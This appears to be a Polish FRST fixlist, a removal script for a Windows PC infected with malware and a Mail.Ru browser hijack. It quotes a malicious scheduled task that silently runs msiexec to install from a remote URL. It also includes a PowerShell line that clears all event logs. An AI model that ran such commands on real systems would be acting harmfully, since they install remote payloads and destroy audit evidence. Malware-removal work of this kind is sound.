CloseProcesses:
ContextMenuHandlers1: [7-Zip] -> {23170F69-40C1-278A-1000-000100020000} => -> Brak pliku
ContextMenuHandlers1: [ANotepad++64] -> {B298D29A-A6ED-11DE-BA8C-A68E55D89593} => -> Brak pliku
ContextMenuHandlers1: [BriefcaseMenu] -> {85BBD920-42A0-1069-A2E4-08002B30309D} => -> Brak pliku
ContextMenuHandlers3: [{4A7C4306-57E0-4C0C-83A9-78C1528F618C}] -> {4A7C4306-57E0-4C0C-83A9-78C1528F618C} => -> Brak pliku
ContextMenuHandlers4: [7-Zip] -> {23170F69-40C1-278A-1000-000100020000} => -> Brak pliku
ContextMenuHandlers5: [igfxcui] -> {3AB1675A-CCFF-11D2-8B20-00A0C93CB1F4} => -> Brak pliku
ContextMenuHandlers6: [BriefcaseMenu] -> {85BBD920-42A0-1069-A2E4-08002B30309D} => -> Brak pliku
Task: {68FEAA01-3A47-4E4C-B55A-1685368B3150} - System32\Tasks\{3543EE5D-FE99-AD25-23F5-03742BD2251B} => "msiexec" /q /i hxxps://refreshnerer711rb.info/G5UinNOyp5.6zZ <==== UWAGA
Task: {ACACA2F2-8091-4146-B26F-4CA8CA18299D} - System32\Tasks\{54D55C0D-2609-A62F-A35D-C02F1C8F7189} => C:\Program Files (x86)\Common Files\INhrB.exe (Microsoft Windows -> Microsoft Corporation)
Task: {D0D2DFB7-2A38-4163-9F20-E25B09C5BCE2} - System32\Tasks\Microsoft\Windows\Google\GoogleUpdateTaskMachineUP => C:\WINDOWS\SysWOW64\Microsoft\Protect\S-1-91-36\RB_1.3.20.90.exe <==== UWAGA
FirewallRules: [{0A1FE4EE-7B27-4B07-AF31-6C95E78B3548}] => (Allow) C:\WINDOWS\SysWOW64\OYYwFQYdnix.exe (Microsoft Windows -> Microsoft Corporation)
FirewallRules: [{5A1F1C2F-F3FE-4C89-A0AC-1E4D6972C887}] => (Allow) C:\Program Files (x86)\Common Files\INhrB.exe (Microsoft Windows -> Microsoft Corporation)
C:\Program Files (x86)\Common Files\INhrB.exe
C:\WINDOWS\SysWOW64\OYYwFQYdnix.exe
FirewallRules: [{64503A19-D801-4A3B-80ED-4916B76F6D5E}] => (Allow) C:\Program Files\Common Files\McAfee\MMSSHost\MMSSHost.exe Brak pliku
FirewallRules: [{0590994E-2B06-4CFF-89E8-0D5AE7939375}] => (Allow) C:\Program Files (x86)\Common Files\Mcafee\MMSSHost\MMSSHost.exe Brak pliku
FirewallRules: [TCP Query User{CF495584-0657-43CB-B826-656336E9242E}C:\users\joannas\appdata\local\microsoft\skypeforbusinessplugin\16.2.0.242\pluginhost.exe] => (Allow) C:\users\joannas\appdata\local\microsoft\skypeforbusinessplugin\16.2.0.242\pluginhost.exe Brak pliku
FirewallRules: [UDP Query User{0F180A3F-AF47-4AAF-BB09-219B34B7451A}C:\users\joannas\appdata\local\microsoft\skypeforbusinessplugin\16.2.0.242\pluginhost.exe] => (Allow) C:\users\joannas\appdata\local\microsoft\skypeforbusinessplugin\16.2.0.242\pluginhost.exe Brak pliku
1601-01-03 21:26 - 1601-01-03 21:26 - 000060416 ____N (Microsoft Corporation) C:\Program Files (x86)\Common Files\INhrB.exe
1601-01-03 21:26 - 1601-01-03 21:26 - 000178688 ____N (Microsoft Corporation) C:\Users\joannas\AppData\Local\ieauOreoYaK.exe
2019-03-13 10:09 - 2019-03-13 10:09 - 000000003 _____ () C:\Users\joannas\AppData\Local\wbem.ini
HKU\S-1-5-21-854575094-164889968-2061861544-1002\Software\Microsoft\Internet Explorer\Main,Start Page = hxxps://mail.ru/cnt/10445?gp=834423
SearchScopes: HKU\S-1-5-21-854575094-164889968-2061861544-1002 -> DefaultScope {FFEBBF0A-C22C-4172-89FF-45215A135AC7} URL = hxxps://go.mail.ru/distib/ep/?q={searchTerms}&fr=ntg&product_id=%7BFF4B9E31-DD93-4183-8168-740E7AF4C5A8%7D&gp=811610
SearchScopes: HKU\S-1-5-21-854575094-164889968-2061861544-1002 -> {97F86C3D-A5E8-482E-BF0C-5080B7E20233} URL =
SearchScopes: HKU\S-1-5-21-854575094-164889968-2061861544-1002 -> {FFEBBF0A-C22C-4172-89FF-45215A135AC7} URL = hxxps://go.mail.ru/distib/ep/?q={searchTerms}&fr=ntg&product_id=%7BFF4B9E31-DD93-4183-8168-740E7AF4C5A8%7D&gp=811610
BHO-x32: Search@Mail.Ru -> {8E8F97CD-60B5-456F-A201-73065652D099} -> C:\Users\joannas\AppData\Local\Mail.Ru\Sputnik\ie_addon_dll.dll [2019-03-13] (LLC Mail.Ru -> Mail.Ru)
Handler: sacore - {5513F07E-936B-4E52-9B00-067394E91CC5} - c:\PROGRA~2\mcafee\SITEAD~1\mcieplg.dll Brak pliku
2019-03-13 10:09 - 2019-03-13 10:22 - 000000000 ____D C:\ProgramData\localNETService
2019-03-13 10:09 - 2019-03-13 10:14 - 000000000 ____D C:\Users\joannas\AppData\Local\Mail.Ru
2019-03-13 10:09 - 2019-03-13 10:09 - 000000000 ____D C:\ProgramData\Mail.Ru
CHR HKLM\...\Chrome\Extension: [fheoggkfdfchfphceeifdbepaooicaho] - hxxp://clients2.google.com/service/update2/crx
CHR HKLM-x32\...\Chrome\Extension: [fheoggkfdfchfphceeifdbepaooicaho] - hxxp://clients2.google.com/service/update2/crx
S3 mfeavfk04; \Device\mfeavfk04.sys [X]
Powershell: wevtutil el | Foreach-Object {wevtutil cl "$_"}
EmptyTemp: